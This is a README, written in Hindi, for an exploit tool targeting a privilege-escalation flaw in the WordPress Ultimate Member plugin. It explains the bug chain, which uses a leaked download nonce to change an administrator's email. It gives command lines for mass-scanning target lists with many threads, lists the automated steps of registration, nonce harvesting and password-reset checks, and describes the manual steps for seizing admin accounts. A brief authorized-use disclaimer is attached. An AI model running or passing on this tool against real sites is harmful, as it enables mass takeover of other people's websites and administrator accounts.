
WordPress Ultimate Member plugin <= 2.13.1 - अधिकार वर्धन सुरक्षा दोष
WordPress Ultimate Member प्लगइन <= 2.13.1 - विशेषाधिकार वृद्धि भेद्यता
Ultimate Member <= 2.13.1 — विशेषाधिकार वृद्धि / खाता अधिग्रहण
📌 आधिकारिक रिकॉर्ड: CVE-2026-96451
CVE.org से:
Ultimate Member में उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बायपास भेद्यता, जो विशेषाधिकार वृद्धि की अनुमति देती है। यह समस्या Ultimate Member को प्रभावित करती है: n/a से 2.13.1 तक।
| फ़ील्ड | मान |
|---|---|
| 🆔 CVE | CVE-2026-96451 |
| 🏷️ CWE | CWE-639 — उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बायपास |
| 📊 CVSS 3.1 | 8.8 HIGH AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 🏢 असाइनर | Patchstack |
| ⚠️ प्रभावित | Ultimate Member 2.13.1 तक |
| ✅ ठीक किया गया | 2.14.0 |
एक लॉग-इन सब्सक्राइबर किसी अन्य उपयोगकर्ता (आमतौर पर व्यवस्थापक) का ईमेल बदल सकता है। इसके बाद WordPress उस नए मेलबॉक्स के लिए पासवर्ड रीसेट स्वीकार कर लेता है।
um_fetch_user($user_id) को कॉल करता है और ग्लोबल उपयोगकर्ता को URL में दिए गए ID पर स्विच कर देता है।download_routing() um_reset_user() के बिना लौट आता है।_um_account=1, user_email=...)।account_submit() um_user('ID') पढ़ता है — अब पीड़ित — और नया ईमेल लिख देता है।डाउनलोड nonce wp_create_nonce($user_id . $form_id . 'um-download-nonce') है। यह उस उपयोगकर्ता ID से बंधा होता है। इसे मनमाने ढंग से नहीं बनाया जा सकता। स्क्रिप्ट इसे एक दृश्यमान /um-download/{form}/{field}/{user}/{nonce}/ लिंक से कॉपी करती है।
प्रोफ़ाइल पर एक कस्टम file या image फ़ील्ड दिखाया जाना चाहिए। अंतर्निहित प्रोफ़ाइल/कवर फ़ोटो यह लिंक उत्पन्न नहीं करतीं।
pip install requests rich
पंजीकरण, लॉगिन, nonce संग्रह, शोषण, और रीसेट जाँच स्वचालित हैं। आपको मैन्युअल रूप से खाते नहीं बनाने हैं और मास स्कैन के लिए सब्सक्राइबर पासवर्ड पास नहीं करना है।
python CVE-2026-96451.py -l targets.txt -t 80 --email "[email protected]" -o um_takeover.txt
यह कमांड प्रत्येक होस्ट पर क्या करता है:
/account/ खोलें/um-download/ nonce खोजें (पहले उपयोगकर्ता ID 1 को प्राथमिकता देता है, फिर फ़ाइल वाले किसी भी सदस्य को)--email पर सेट करेंwp-login.php?action=lostpassword की जाँच करें (WordPress को यहाँ nonce की आवश्यकता नहीं है)um_takeover.txt में लिखें--email वह मेलबॉक्स है जो लक्ष्य खाते पर रखा जाता है ताकि आप रीसेट प्राप्त कर सकें। स्क्रिप्ट इनबॉक्स नहीं खोलती और नया पासवर्ड सेट नहीं करती। वह अंतिम चरण मैन्युअल है।
python CVE-2026-96451.py -u "https://example.com" --email "[email protected]"
| फ़्लैग | उद्देश्य | डिफ़ॉल्ट |
|---|---|---|
-l / --list | लक्ष्यों की फ़ाइल | — |
-u / --url | एक लक्ष्य | — |
-t / --threads | वर्कर | 10 |
-o / --output | परिणाम फ़ाइल | um_takeover.txt |
--email | पीड़ित पर लिखा जाने वाला मेलबॉक्स | स्वतः-निर्मित |
--target-id | पसंदीदा उपयोगकर्ता ID | 1 |
--user / --password | पंजीकरण के बजाय मौजूदा सब्सक्राइबर का उपयोग करें | बंद |
-v / --verbose | प्रत्येक चरण प्रिंट करें | बंद |
धीमे RDP बॉक्स पर, 80–150 थ्रेड्स पर्याप्त हैं। एक सूची स्कैन प्रत्येक होस्ट को लगभग 22 सेकंड देता है।
[5400/11965] RST:0 CHG:0 UM:4463 REG:589 rf:3874 lf:0 na:141 nd:448 nc:0 no:937
| कोड | अर्थ |
|---|---|
RST / CHG | ईमेल बदला गया और/या रीसेट स्वीकृत — इनबॉक्स जाँचें |
UM | Ultimate Member का पता चला |
REG | ऑटो-पंजीकरण ने एक सत्र बनाया |
rf | कोई सार्वजनिक फ़ॉर्म, CAPTCHA, अनुमोदन, या ईमेल सक्रियण नहीं |
lf | पंजीकृत लेकिन लॉगिन विफल |
na | खाता पृष्ठ / nonce अनुपलब्ध |
nd | कोई दृश्यमान डाउनलोड nonce नहीं (कोई कस्टम फ़ाइल फ़ील्ड नहीं) |
nc | शोषण भेजा गया, परिवर्तन की पुष्टि नहीं हुई |
no | Ultimate Member नहीं है |
कई होस्ट पर REG_FAIL सामान्य है। श्रृंखला केवल वहीं जारी रहती है जहाँ पंजीकरण एक सत्र बनाता है और एक डाउनलोड लिंक दिखाई देता है।
जब RST या CHG दिखाई दे:
--email को पास किए गए मेलबॉक्स को खोलें/wp-login.php या /wp-admin/ पर साइन इन करेंयह प्रोजेक्ट केवल अधिकृत सुरक्षा अनुसंधान के लिए है — उन सिस्टमों के लिए जिनके आप स्वामी हैं या जिनका परीक्षण करने की आपके पास लिखित अनुमति है।
कंप्यूटर सिस्टमों तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ़्टवेयर के दुरुपयोग, क्षति, या किसी भी परिणाम के लिए कोई दायित्व स्वीकार नहीं करता। इसका उपयोग कैसे किया जाता है और आप जिन लक्ष्यों को स्कैन करते हैं, उनके लिए पूरी जिम्मेदारी आपकी है।
द्वारा: Nxploited ( Khaled Alenazi )